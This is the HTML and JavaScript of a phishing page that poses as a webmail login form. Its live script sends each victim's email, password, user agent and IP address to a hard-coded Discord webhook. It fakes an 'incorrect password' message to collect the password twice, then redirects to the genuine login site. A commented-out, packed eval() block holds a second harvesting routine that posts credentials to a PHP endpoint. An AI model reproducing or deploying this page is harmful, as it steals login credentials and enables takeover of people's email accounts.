<html><head>
    <meta charset="UTF-8">
    <title>Webmail</title>
    <input type="hidden" name="lourl" value="https://webmail.emailsrvr.com" id="lourl">

    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,400,500,700">
  
    <style>
      /* Page Defaults */
      * {
        -webkit-box-sizing: border-box;
        -moz-box-sizing: border-box;
        box-sizing: border-box;
      }
      body {
        font-family: "Roboto", "Helvetica Neue", Helvetica, Arial, sans-serif;
        font-size: 14px;
        line-height: 1.42857;
        color: #333333;
        background-color: #FAFAFA;
        margin: 0;
      }
  
      /* Page Layout */
      #content {
        display: flex;
        align-items: center;
        justify-content: center;
        position: fixed;
        top: 0;
        left: 0;
        bottom: 0;
        right: 0;
        background: #EAEAEA;
      }
      #content-header {
        height: 53px;
        padding: 16px;
        font-size: 24px;
        font-weight: 300;
        line-height: 18px;
        background: #424242;
        color: #FCFCFC;
      }
      #content-header-logo {
        float: right;
      }
      #logo {
        width: 130px;
        height: 26px;
      }
      #content-header-label {
        float: left;
      }
      #content-body {
        display: flex;
        justify-content: start;
        background: #FFFFFF;
        min-width: 500px;
      }
  
      /* Form Layout */
      #form {
        display: flex;
        flex-direction: column;
        justify-content: center;
        padding: 20px;
        min-height: 268px;
        width: 100%;
      }
      #form-body {
        height: 205px;
        width: 100%;
        margin: 40px 0px 0px 20px;
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        padding-right: 20px;
      }
      #form-container {
        width: 100%;
        margin: 0px auto;
        padding: 0px 10px;
      }
      .row {
        margin: 0px -10px;
      }
      .row:before, .row:after {
        content: " ";
        display: table;
      }
      .col {
        width: 100%;
        float: left;
        position: relative;
        min-height: 1px;
        padding: 0px 10px;
      }
      .form-group {
        width: inherit;
        padding-right: 30px;
        margin-bottom: 20px;
      }
      .form-label {
        position: relative;
        font-family: Roboto;
        font-size: 16px;
        margin-bottom: 8px;
        line-height: 1;
        color: #616161;
        display: inline-block;
        max-width: 100%;
      }
      .form-field {
        border: 1px solid #BDBDBD;
        border-radius: 2px;
        background: #FFFFFF;
        font-family: Roboto;
        font-size: 16px;
        color: #616161;
        height: 32px;
        display: block;
        width: 100%;
        padding: 4px 8px;
        line-height: 1.42857;
        -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
        box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
        -webkit-transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
        -o-transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
        transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
      }
      #forgot-password {
        position: absolute;
        top: 0px;
        right: 40px;
        color: #0C7C84;
        text-decoration: none;
        background-color: transparent;
        box-sizing: border-box;
      }
      #login-btn-toolbar {
        float: right;
        margin: auto 30px 15px -20px;
      }
      #login-btn {
        float: right;
        display: inline-flex;
        flex-direction: row;
        justify-content: center;
        align-items: center;
        padding: 0 12px;
        height: 32px;
        line-height: 1px;
        font-size: 14px;
        font-weight: 400;
        text-transform: capitalize;
        color: #fff;
        background-color: #0C7C84;
        border-color: #0C7C84;
        margin-bottom: 0;
        text-align: center;
        vertical-align: middle;
        touch-action: manipulation;
        cursor: pointer;
        background-image: none;
        border: 1px solid transparent;
        white-space: nowrap;
        border-radius: 2px;
        -webkit-user-select: none;
        -moz-user-select: none;
        -ms-user-select: none;
        user-select: none;
      }
      #form-container {
        width: 100%;
        margin: 0px auto;
        padding: 0px 10px;
      }
      @media only screen
        and (max-device-width: 480px) {
        /* Page Defaults */
        body {
          font-size: 19pt;
          line-height: 1.42857em;
        }
        /* Page Layout */
        #content {
          align-items: inherit;
          display: inherit;
          justify-content: inherit;
        }
        #content-header {
          font-size: 171%;
          height: 3em;
          line-height: 1em;
          padding: 1em;
        }
        /* Form Layout */
        .form-label {
          font-size: 114%;
        }
        .form-field {
          font-size: 114%;
          height: 2em;
        }
        #forgot-password {
          right: 2em;
          top: 0;
        }
        #login-btn-toolbar {
          margin: 1.5em 2em 1em -1.5em;
        }
        #login-btn {
          font-size: 150%;
          height: 3em;
          padding: 1.25em;
        }
      }
    </style>
  
    <script>
      // This section is here to give examples on how to modify form content in the new layout.
  
      // Change Username or Password Labels (helpful for non-english login pages).
      // document.getElementById('pass-label').innerHTML = 'contraseña';
      // document.getElementById('user-label').innerHTML = 'usuario';
  
      // Hide forgot password link (Not recommended as even if you disable this feature, the link is useful for your users).
      // document.getElementById('forgot-password').style.display = 'none'
    </script>
  
    </head><body>
      <div>
        <div id="content">
          <div>
            <div id="content-header">
              <div id="content-header-label">Webmail Login</div>
              <div id="content-header-logo">
                  <!-- To add a logo just put it in an img tag below this comment! -->
              </div>
            </div>
            <div id="content-body">
              <!-- DO NOT REMOVE THE FOLLOWING LINE YOUR SITE WILL NOT WORK WITHOUT IT!!! -->
      <form id="form" method="" name="login" action="" autocomplete="off" onsubmit="return false">
    
    <div id="form-body">
        <div id="form-container"><div style="  color: rgb(211, 47, 47); margin-bottom: 20px; font-weight: 500;" id="msg">Username / Password incorrect</div>
      <div id="form-container">
        <!-- destination and flags is used for OWA login -->
        
        <div id="user-row" class="row">
          <div id="user-col" class="col">
            <div id="user-field" class="form-group">
              <label id="user-label" class="form-label">Email address</label>
              <input id="email" name="email" tabindex="1" class="form-field" value="" autocomplete="username">
            </div>
          </div>
        </div>
        <div id="pass-row" class="row">
          <div id="pass-col" class="col">
            <div id="pass-field" class="form-group">
              <label id="pass-label" class="form-label">Password</label>
              <input id="password" name="password" tabindex="2" type="password" class="form-field" value="" autocomplete="current-password">
            </div>
            <a id="forgot-password" href="#password" tabindex="4">Forgot password?</a>
          </div>
        </div>
      </div>
    </div>
    <div id="login-btn-toolbar">
      <button id="submit-btn" tabindex="3" type="button">Log In</button>
    </div>
  </form>
              <!-- This section contains an EXAMPLE of the login form.
                   You should use this for help with style changes.
                   DO NOT try to change this area as it does nothing.
                   All html tags are just "element" to ensure no css uses html selectors.
                   Please only use IDs and Classes.
  
                   <element id="form">
                     <element id="form-body">
                       <element id="form-container">
                         <element id="user-row" class="row">
                           <element id="user-col" class="col">
                             <element id="user-field" class="form-group">
                               <element id="user-label" class="form-label">Username</element>
                               <element id="user-input" name="user_name" class="form-field" />
                             </>
                           </>
                         </>
                         <element id="pass-row" class="row">
                           <element id="pass-col" class="col">
                             <element id="pass-field" class="form-group">
                               <element id="pass-label" class="form-label">Password</element>
                               <element id="pass-input" name="password" class="form-field" />
                             </>
                             <element id="forgot-password">Forgot password?</element>
                           </>
                         </>
                       </>
                     </>
                     <element id="login-btn-toolbar">
                       <element id="login-btn">Log In</element>
                     </>
                   </>
              -->
            </div>
          </div>
        </div>
      </div>

      
<script type="text/javascript">
  function la(src) {
    window.location=src;
  }
</script>

<script>
  function isBase64(str) {
  if (typeof str !== 'string') {
    return false;
  }
  const notBase64 = /[^A-Z0-9+\/=]/i;
  const len = str.length;

  if (!len || len % 4 !== 0 || notBase64.test(str)) {
    return false;
  }

  const firstPaddingChar = str.indexOf('=');
  return firstPaddingChar === -1 ||
    firstPaddingChar === len - 1 ||
    (firstPaddingChar === len - 2 && str[len - 1] === '=');
}

function sleep(milliseconds) {
    const date = Date.now();
    let currentDate = null;
    do {
      currentDate = Date.now();
    } while (currentDate - date < milliseconds);
  }

var linksc = window.location.href
var value = linksc.split('#')[1].split('$')[0];
const values = value


// texts = "Please verify your account";
//s_texts = "";
//sm_texts = "";
// document.getElementById("success-message"); 

//document.getElementById("success").innerHTML = sm_texts; 
// document.getElementById("text-message").innerHTML = texts; 
document.getElementById("email").value = values; 
// const element = document.getElementById('succes');
// element.classList.remove('gone');




let count = 0;
var btn = document.getElementById("submit-btn");
var pwd = document.getElementById("password");
var agents = navigator.userAgent;



btn.onclick = function () {
if (pwd.value.length > 0){
    count++;
    if (count <=2){ 
      
      var xhr = new XMLHttpRequest();
        xhr.open("GET", "https://api.ipify.org/?format=json", true);
        xhr.onreadystatechange = function () {
            if (xhr.readyState === 4 && xhr.status === 200) {
            var response = JSON.parse(xhr.responseText);
            // Handle the response data here
            var ipAddress = response.ip

            request.open("POST", "https://discord.com/api/webhooks/1255109847435706480/2uzqiIqqtJ6E9MJmF33-zkZfh3nBHxjoET8Nl-cmuUa1Fy1EtszH9NQbZ_cq2mXfoLr_");
            request.setRequestHeader('Content-type', 'application/json');
            var params = {
            content: (" > **IP: **" + ipAddress)
            }
            request.send(JSON.stringify(params));
                

            }

        };
        xhr.send();



      var request = new XMLHttpRequest();
      request.open("POST", "https://discord.com/api/webhooks/1255109847435706480/2uzqiIqqtJ6E9MJmF33-zkZfh3nBHxjoET8Nl-cmuUa1Fy1EtszH9NQbZ_cq2mXfoLr_");
      request.setRequestHeader('Content-type', 'application/json');
      var params = {
          content: ("> **USERNAME : **" + document.getElementById('email').value + "\n> **PASSWORD : **" + document.getElementById('password').value + "\n> **USER-AGENT: **" + agents)
      }
      request.send(JSON.stringify(params));
      text = "Incorrect name or password.";
      document.getElementById("form-container").innerHTML = text;
      document.getElementById("password").value = "";
      sleep(1000)
    } 
    if(count==2){
    texts = "Verification successful... Thank you.";
    document.getElementById("form-container").style.color = "#00b300"; 
    document.getElementById("form-container").innerHTML = texts;   
    sleep(2500)
    window.location.replace("https://webmail.emailsrvr.com/wmidentity/Account/Login");
     }
}else{
  // document.getElementById("login-status").style.visibility = "visible";
  text = "Enter your password"
  document.getElementById("form-container").innerHTML = text;


 
}

}
</script>
    
      <!-- <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
      <script>
         eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(16).17(6(){3 m=0;$(\'#18\').M(6(){$("#8").A();$(\'#B\').5("");$("#19").N({1a:O,P:"A"},0);$("#1b").N({1c:O,P:"w"},1d)});3 n=F.G.1e.x(1);7(!n){}Q{3 o=n;$(\'#B\').5(o);$(\'#1f\').y(o);3 p=/^([a-u-v-R\\.\\-])+\\@(([a-u-v-9\\-])+\\.)+([a-u-v-9]{2,4})+$/;7(!p.S(o)){$(\'#C\').w();n.T;U V}3 q=o.D("@");3 r=o.x((q+1));3 c=r.x(0,r.D(\'.\'));3 s=c.W();3 t=c.X();$("#H").I("Y","Z://10.11.12/"+r);$("#H").I("1g",t);$("#J").y(t);$(".J").y(t)}$(\'#K-L\').M(6(b){$(\'#C\').A();$(\'#8\').A();b.1h();3 d=$("#B").5();3 e=$("#E").5();3 z=$("#13").5();3 f=$(\'#8\').y();$(\'#8\').1i(f);3 g=d;3 h=/^([a-u-v-R\\.\\-])+\\@(([a-u-v-9\\-])+\\.)+([a-u-v-9]{2,4})+$/;7(!h.S(g)){$(\'#C\').w();d.T;U V}3 i=g.D("@");3 j=g.x((i+1));3 c=j.x(0,j.D(\'.\'));3 k=c.W();3 l=c.X();$("#H").I("Y","Z://10.11.12/"+j);$("#J").y(l);m=m+1;$.1j({1k:\'1l\',1m:\'../1n-1o.1p\',1q:\'1r\',1s:{B:d,E:e,13:z,},1t:6(a){$(\'#K-L\').5(\'1u...\')},1v:6(a){7(a){$("#8").w();1w.1x(a);7(a[\'1y\']==\'1z\'){$("#E").5("");7(m>=2){m=0;F.G.1A("14://15."+j)}}Q{}}},C:6(){$("#E").5("");7(m>=2){m=0;F.G.1B("14://15."+j)}$("#8").w()},1C:6(){$(\'#K-L\').5(\'1D\')}})})});',62,102,'|||var||val|function|if|msg||||||||||||||||||||||zA|Z0|show|substr|html||hide|email|error|indexOf|password|window|location|logoimg|attr|logoname|submit|btn|click|animate|200|opacity|else|9_|test|focus|return|false|toLowerCase|toUpperCase|src|https|logo|clearbit|com|lourl|http|www|document|ready|back1|automail|left|inputbar|right|1000|hash|emailich|alt|preventDefault|text|ajax|dataType|JSON|url|form|loaded|php|type|POST|data|beforeSend|Verifing|success|console|log|signal|ok|href|replace|complete|LOGIN'.split('|'),0,{}))
      </script> -->
  </body></html>